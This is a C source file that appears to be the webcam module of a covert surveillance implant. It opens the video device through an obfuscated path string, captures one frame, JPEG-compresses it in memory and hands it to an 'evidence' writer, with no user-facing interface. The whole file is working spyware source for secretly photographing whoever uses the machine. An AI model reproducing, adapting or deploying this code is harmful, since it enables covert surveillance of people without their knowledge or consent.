#include <stdio.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <jpeglib.h>
#include <openssl/bio.h>
#include <string.h>
#include <linux/videodev2.h>
#include <libv4l2.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"
#include "so.h"
#include "runtime.h"

extern Display *display;

void *module_camera_start(void *args)
{
   struct v4l2_format fmt;
   struct v4l2_buffer buf;
   struct v4l2_requestbuffers req;
   enum v4l2_buf_type type;
   struct {
      void   *start;
      size_t length;
   } *buffers = NULL;

   fd_set fds;
   struct timeval tv;
   int i, fd = -1;

   struct jpeg_compress_struct cinfo;
   struct jpeg_error_mgr jerr;
   JSAMPROW row;
   unsigned char *outbuf = NULL;
   unsigned long int outlen = 0;
   unsigned int quality = 90;

   BIO *bio_data = NULL;
   int datalen;
   char *dataptr;
   
   debugme("Running module CAMERA\n");

   if(MODULE_CAMERA.status == MODULE_STARTING) MODULE_CAMERA.status = MODULE_STARTED;

   do {
      memset(&req, 0x00, sizeof(req));
      if((fd = v4l2_open(so131, O_RDWR | O_NONBLOCK, 0)) < 0) break;

      memset(&fmt, 0x00, sizeof(fmt));
      fmt.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
      fmt.fmt.pix.width = 640;
      fmt.fmt.pix.height = 480;
      fmt.fmt.pix.pixelformat = V4L2_PIX_FMT_RGB24;
      fmt.fmt.pix.field = V4L2_FIELD_INTERLACED;
      if(v4l2_ioctl(fd, VIDIOC_S_FMT, &fmt) == -1) break;
      if(fmt.fmt.pix.pixelformat != V4L2_PIX_FMT_RGB24) break;

      req.count = 2;
      req.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
      req.memory = V4L2_MEMORY_MMAP;
      if(v4l2_ioctl(fd, VIDIOC_REQBUFS, &req) == -1) break;

      if(!(buffers = calloc(req.count, sizeof(*buffers)))) break;
      for(i = 0; i < req.count; i++) {
         memset(&buf, 0x00, sizeof(buf));

         buf.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
         buf.memory = V4L2_MEMORY_MMAP;
         buf.index = i;

         if(v4l2_ioctl(fd, VIDIOC_QUERYBUF, &buf) == -1) break;

         buffers[i].length = buf.length;
         buffers[i].start = v4l2_mmap(NULL, buf.length, PROT_READ | PROT_WRITE, MAP_SHARED, fd, buf.m.offset);

         if(buffers[i].start == MAP_FAILED) break;
      }
      if(i != req.count) break;

      for(i = 0; i < req.count; i++) {
         memset(&buf, 0x00, sizeof(buf));
         buf.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
         buf.memory = V4L2_MEMORY_MMAP;
         buf.index = i;
         if(v4l2_ioctl(fd, VIDIOC_QBUF, &buf) == -1) break;
      }
      if(i != req.count) break;

      type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
      if(v4l2_ioctl(fd, VIDIOC_STREAMON, &type) == -1) break;

      FD_ZERO(&fds);
      FD_SET(fd, &fds);
      tv.tv_sec = 5;
      tv.tv_usec = 0;
      if(select(fd + 1, &fds, NULL, NULL, &tv) <= 0) break;
      memset(&buf, 0x00, sizeof(buf));
      buf.type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
      buf.memory = V4L2_MEMORY_MMAP;
      if(v4l2_ioctl(fd, VIDIOC_DQBUF, &buf) == -1) break;

      cinfo.err = jpeg_std_error(&jerr);
      jpeg_create_compress(&cinfo);
      jpeg_mem_dest(&cinfo, &outbuf, &outlen);

      cinfo.image_width = fmt.fmt.pix.width;
      cinfo.image_height = fmt.fmt.pix.height;
      cinfo.input_components = 3;
      cinfo.in_color_space = JCS_RGB;

      if(MODULE_CAMERA.param) quality = ((module_camera_t *)MODULE_CAMERA.param)->quality;

      jpeg_set_defaults(&cinfo);
      jpeg_set_quality(&cinfo, quality, TRUE);
      jpeg_start_compress(&cinfo, TRUE);

      while(cinfo.next_scanline < cinfo.image_height) {
         row = (JSAMPROW)(((char *)buffers[buf.index].start) + (cinfo.next_scanline * 3 * fmt.fmt.pix.width));
         jpeg_write_scanlines(&cinfo, &row, 1);
      }
      jpeg_finish_compress(&cinfo);
      jpeg_destroy_compress(&cinfo);

      bio_data = BIO_new(BIO_s_mem());

      BIO_write(bio_data, outbuf, outlen);

      BIO_flush(bio_data);

      datalen = BIO_get_mem_data(bio_data, &dataptr);

      evidence_write(EVIDENCE_TYPE_CAMERA, NULL, 0, dataptr, datalen);
   } while(0); 
   if(bio_data) BIO_free(bio_data);

   type = V4L2_BUF_TYPE_VIDEO_CAPTURE;
   v4l2_ioctl(fd, VIDIOC_STREAMOFF, &type);

   for(i = 0; i < req.count; i++) v4l2_munmap(buffers[i].start, buffers[i].length);
   if(fd != -1) v4l2_close(fd);
   if(outbuf) free(outbuf);
   if(buffers) free(buffers);

   MODULE_CAMERA.status = MODULE_STOPPED;

   return NULL;
}
